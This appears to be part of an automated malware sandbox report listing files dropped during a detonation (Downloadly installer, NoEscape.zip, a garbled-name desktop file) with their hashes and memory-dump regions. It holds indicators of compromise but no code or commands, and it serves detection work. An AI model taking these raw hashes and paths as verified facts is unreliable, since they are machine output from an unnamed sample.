MD5 3f58e8855c08e01efc18a3580d8fdf61
SHA1 2a8384a25091699f978bd6d678d090e89f3df49a
SHA256 9aa5e80d255c9e49e9f95dec73533248f5a7fe3a8632a2cb780ef084adbb734b
SHA512 1da1b7d7b3e1f4c7a49ffe22f70cd79688d8c467e5e4e127a490386582437a17bbc294ae7adf210c780d7ce450bb640139268258912c61f54a80b8ab47131933

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 bc4836b104a72b46dcfc30b7164850f8
SHA1 390981a02ebaac911f5119d0fbca40838387b005
SHA256 0e0b0894faf2fc17d516cb2de5955e1f3ae4d5a8f149a5ab43c4e4c367a85929
SHA512 e96421dd2903edea7745971364f8913c2d6754138f516e97c758556a2c6a276ba198cdfa86eb26fe24a39259faff073d47ef995a82667fa7dee7b84f1c76c2b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

MD5 2f3c7b5f9221520efbdb40dc21658819
SHA1 df12f010d51fe1214d9aca86b0b95fa5832af5fd
SHA256 3ba36c441b5843537507d844eca311044121e3bb7a5a60492a71828c183b9e99
SHA512 d9ed3dccd44e05a7fde2b48c8428057345022a3bcea32b5bdd42b1595e7d6d55f2018a2d444e82380b887726377ab68fa119027c24ac1dadc50d7918cc123d7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

MD5 e80a1089da3f589b77b09cbe69e869da
SHA1 7a42bfa54718a4b4530a69bb6da757b93d2a70ec
SHA256 9f0e7b008e969ff0d42092795510889b1a7b4816fa2533a32353a2f35c12042d
SHA512 24a09fcfcf796d948a21c5d6b7646c1eec7f62bbae5eabc23b0d86cda5c10ced12ae4dbcc3ef6ac9c98eeacc83129609fc45e685ca923f3aae2f2882203e811c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d79b363d68b088a423507b949ba750d5
SHA1 8e4211d6123d17a1ccf0be6a5a86c0c3e6923227
SHA256 a52056df4561763db2230d87187c3fd05273df99930682fdba5ca8f5c845798b
SHA512 a03a555e9d163635aca8a0aa5bca79aad6f5a6969154f7ba4baae77452f77d3be8eeff70b5c41cbeaac2a7da33ad616b763ecf2fcd1ed41f1fa791af3e6dbedd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1e7901515e88e44a0f726bfe401ebf07
SHA1 ca3ac6e45b7869701b6433e5c13d471f37c70459
SHA256 80380027d00a5a1e0011332f0dd9dec3bb3dbe886f190c3637d08e7f8fed98b2
SHA512 bcfc4e7fd7764877cf54fa79eddf222df364653fd5b888904467ada188d9eae3624561aafaad12d135a86c5f9d169128e3ace061be5fe3c87c8c25294b5930e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe620f3d.TMP

MD5 5e657520a5ea6ee4749bd712e13106a0
SHA1 cef4cb28b18a48a67b06a5ec4e03ea1b01c5687b
SHA256 bb98354c6934b6f6abea0ad9630c54abecf42c3b0be39583e2a1fc81efebbe33
SHA512 e7f268f41102a7fb1e9484951c074eadfdf3acd795a73587acf7508866b0b1a865322aa7e338251b116d58970eb505b917eee7f1f29e22375dea7a3bbdd5b7a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d65244bd727fe31b90f0c2eab2588142
SHA1 0830bbbc8e015888c05f1a181a2f8743fa246131
SHA256 0afa2e55729178e771909ceed8894ba686549f91ef0cd7d0ef7ed7d71ae9d744
SHA512 0d974de88d0eb1a0df303774ad3ee533c47c9e22711679628f6b710bc75e75285d3629f8a5435a98a869b916c08cd2e5cedbbf5ccdb06930e6dacc232f7055f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5d6968e1ce16e2c4e9f068df0c77b4c6
SHA1 d25f0bf7be515e1b0bd0a4b93585e49306c8bc3f
SHA256 0ca7be8d64426cf26bf50a307c7d0f42b5ee4940aea4471eece69961b0031cbf
SHA512 b655705834ba5f7aa1fd6ff1f230966282e2c055149e0d56d3baeeae51ae7bd3db2b6de855833f5390f0817b9f96561d7928faee3a18d430871bb1194491c3fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a835eacc418e80d4407f3767cb7a98f6
SHA1 8ab45616dcd729a3f395c71bb3e4525f009fc146
SHA256 746d1e9c6b48d2ff4c7fa5cacfb2053833b5b7eda1140c445322545c1f2533d2
SHA512 4865b4174b954885bff3a6d696b78cc4ab62a3429ffcecb8b9a0f800164e66b94aa42e5807bb061596bed44db2059c6b52fc8fb549ca195aae0908cbfc311d71

C:\Users\Admin\Downloads\Downloadly.zip

MD5 0a0f5d4bbd7f1f262b515c241eaa6f23
SHA1 030a19704c38ea2235766b72769d39f78b9a8eec
SHA256 9d7dadfe03e2dd2225cd3c379e828fb61acc61bdfb1a2f5e39fe208e202ae921
SHA512 fc311a7ee859871f34205981084257f2b3e11074f11105bd7f67e25546319fb0cedf86c580458ab57793ccdf36f0bcdd732b6c95c4e3fc3e243e5961b2820b60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ac2b5197a59995303629b881143a6b35
SHA1 b546789601cd8138b4f8ce771eb24b788b0945a5
SHA256 3ae39e6309941be6a423b66a38898bc1dcc1fafc26f39657c6fd55d48e720091
SHA512 55a52bc07996d1d3b53f2cb4307d4c1fb3975fcb8d6c8d1a8e3c0fda0b09181d6e7feecaf209ab303bbb20068b357f0ebd5d8a59649869b89b670ec372aed451

memory/3048-3197-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 58d5f9c7ecf8325a05a996baea0b59de
SHA1 ba39eb58e1ba71606b39fb05733f8ed58791d546
SHA256 494861d4afbdf435bb07b13540ea29cdeb839c23213d38ac3e1cdc866bb58d0f
SHA512 738192a66bd7ea1a0afad6d8356a29bf510e092f750517452b41edde25fb718c0164763a0450ca1287e76afb45b229e2e93266f810772ea84659cd5f4680217b

memory/2408-3209-0x0000000002560000-0x0000000002561000-memory.dmp

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

MD5 c64463e64b12c0362c622176c404b6af
SHA1 7002acb1bc1f23af70a473f1394d51e77b2835e4
SHA256 140dcfc3bde8405d26cfe50e08de2a084fb3be7cf33894463a182e12001f5ce7
SHA512 facd1c639196d36981c89048c4e9ccf5f4e2a57b37efc4404af6cafb3ec98954fe5695b0d3a3ee200b849d45d3718b52cce0af48efba7c23b1f4613bcaa35c0a

memory/1740-3339-0x0000018BA59F0000-0x0000018BA5A74000-memory.dmp

memory/1740-3340-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/1740-3341-0x0000018BA76A0000-0x0000018BA76E6000-memory.dmp

memory/1740-3342-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/1740-3343-0x0000018BC02D0000-0x0000018BC02E0000-memory.dmp

memory/3048-3349-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1740-3350-0x0000018BC1530000-0x0000018BC15E0000-memory.dmp

memory/1740-3351-0x0000018BC14D0000-0x0000018BC14F2000-memory.dmp

memory/1740-3353-0x0000018BC1490000-0x0000018BC1498000-memory.dmp

memory/1740-3354-0x0000018BC1620000-0x0000018BC1658000-memory.dmp

memory/1740-3355-0x0000018BC14A0000-0x0000018BC14AE000-memory.dmp

memory/1740-3368-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/2796-3371-0x0000000000400000-0x0000000000516000-memory.dmp

memory/1740-3369-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/4592-3374-0x00000000025E0000-0x00000000025E1000-memory.dmp

C:\Users\Admin\AppData\Local\Massive\usage\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Massive\usage\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

memory/1740-3454-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/2796-3456-0x0000000000400000-0x0000000000516000-memory.dmp

memory/1740-3457-0x0000018BC0D80000-0x0000018BC0D88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe

MD5 ce8239c6118c4cf509b85848e6d85094
SHA1 696085331c75e328ef6e8785e302a39e713429cc
SHA256 2d3262cbc35e3b6be149d1534696d757066b961e531f391363a2aa2912784880
SHA512 ae97f3213272724c697d5788be2ca8f1d0b10bb5a467ce3969eac59d18117abebe9972a416187f54516bf67fbb0ae75811648a101f668543e3264b1b099509b4

memory/3104-3471-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4388-3475-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1740-3488-0x0000018BC0C80000-0x0000018BC0C92000-memory.dmp

memory/3276-3489-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1740-3491-0x0000018BC0C70000-0x0000018BC0C7A000-memory.dmp

memory/1740-3492-0x0000018BC0CA0000-0x0000018BC0CA8000-memory.dmp

memory/1740-3494-0x0000018BC0CB0000-0x0000018BC0CB8000-memory.dmp

memory/2096-3498-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/1740-3497-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

C:\Users\Admin\Programs\Downloadly\is-6T07P.tmp

MD5 8097152e93a43ead7dc59cc88ea73017
SHA1 b21d9f73ecf57174ce8ec5091e60c3a653f97ecd
SHA256 5a522e16c4b9be7d757585c811e2b7b4eab6592aed1fbc807d4154974b7bb98f
SHA512 d885a2ecba46c324c05d63b5482d604429556fe864202b1127866f2798ead67228390fb730d44ccef205c8103129d89d88a9541a4657d55c01373f8db50f7b23

memory/3276-3514-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

MD5 9e1e1786225710dc73f330cc7f711603
SHA1 b9214d56f15254ca24706d71c1e003440067fd8c
SHA256 bd19ac814c4ff0e67a9e40e35df8abd7f12ffaa6ebefaa83344d553d7f007166
SHA512 6398a6a14c57210dc61ed1b79ead4898df2eb9cea00e431c39fc4fb9a5442c2dc83272a22ca1d0c7819c9b3a12316f08e09e93c2594d51d7e7e257f587a04bef

memory/240-3641-0x00000288F24C0000-0x00000288F2548000-memory.dmp

memory/240-3640-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/240-3642-0x00000288F4160000-0x00000288F41A6000-memory.dmp

memory/240-3643-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3644-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3645-0x00000288F41F0000-0x00000288F4200000-memory.dmp

memory/3104-3650-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/240-3651-0x00000288F60B0000-0x00000288F6160000-memory.dmp

memory/240-3665-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3664-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/3400-3666-0x0000000000400000-0x0000000000516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D8DE2.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

memory/2096-3669-0x0000000002600000-0x0000000002601000-memory.dmp

memory/240-3685-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3684-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/240-3687-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a6157fb0435b890a958e7e1adac862b1
SHA1 b579b9fc8597ddbf1457797fefb70755df22a158
SHA256 dd7465d82fbf55d768013169a2e58d9d4638c5b38097e1038996b4362081fc2c
SHA512 0017407b90fab796298af2a762425dc3ba370326a2d1da310ff353ef93fb39f25a49c31a60eee2c46d8b85a6600fcccaefba8c4411cba1ff9c069b217d4f0000

memory/240-3706-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

C:\Users\Admin\Downloads\NoEscape.zip

MD5 ef4fdf65fc90bfda8d1d2ae6d20aff60
SHA1 9431227836440c78f12bfb2cb3247d59f4d4640b
SHA256 47f6d3a11ffd015413ffb96432ec1f980fba5dd084990dd61a00342c5f6da7f8
SHA512 6f560fa6dc34bfe508f03dabbc395d46a7b5ba9d398e03d27dbacce7451a3494fbf48ccb1234d40746ac7fe960a265776cb6474cf513adb8ccef36206a20cbe9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f6696a99-c74a-4613-85ac-40b737efb044.tmp

MD5 f3f4f23d8800acf13b4a81290665190e
SHA1 36ebed332c279faefbad32e1c9ff0c3e34b95f34
SHA256 47449584139e3d5e7534564a251317f24d20b84b3520c6b8071b613f99af9130
SHA512 e00574e06400203156e13f2ed290b367628e5c28f1ba6c56acf078749bdda0d0fcfddf1a1dc43233985a833a83006b422aedadb99b75ca57760cf8648e39c2ae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 94bfc41916b70a8ccd5cd4003e14f80d
SHA1 a5e37e037e35b90a7ab0bb3f6e439fcf649f9b58
SHA256 897f1d5b45255182209c4cfb0555d1ec0ad74952d486cf65fc176766bebb9b10
SHA512 269a1128de7cd121481db977146f6ac0baf1d478a1086e1ae017619c050edb65d68110c90c9fd11da850659d61e4b32b74681426b31a698e716472dc0b9eb60d

C:\Users\Public\Desktop\ᔒ⭘༑ⲽ؞ᛎዐᖋᒩエ⊒ᴠ൨ᲢଈὭ⪦௪࢐✢෸

MD5 e49f0a8effa6380b4518a8064f6d240b
SHA1 ba62ffe370e186b7f980922067ac68613521bd51
SHA256 8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13
SHA512 de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4